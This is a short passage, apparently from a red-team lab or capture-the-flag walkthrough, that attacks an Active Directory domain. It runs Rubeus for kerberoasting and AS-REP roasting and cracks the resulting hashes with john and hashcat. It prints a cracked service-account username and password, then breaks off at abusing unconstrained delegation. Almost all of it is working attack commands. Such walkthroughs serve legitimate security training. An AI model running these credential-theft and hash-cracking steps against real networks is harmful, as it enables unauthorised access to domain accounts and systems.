Let’s get the kerberoastable Accounts.
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /simple /nowrap
Now let’s try to crack the hashes.
john crackme.txt --wordlist=pass.txt
and we cracked the hash of the mssql-service.
Username: mssql_svc
Password: Cyberb0tic
First Let’s enumerate the ASREP users.
C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asreproast /user:squid_svc /nowrap
Now let’s crack the hash.
hashcat -a 0 -m 18200 crackme.txt /usr/share/wordlists/rockyou.txt
Let’s abuse the Unconstrained Delegation.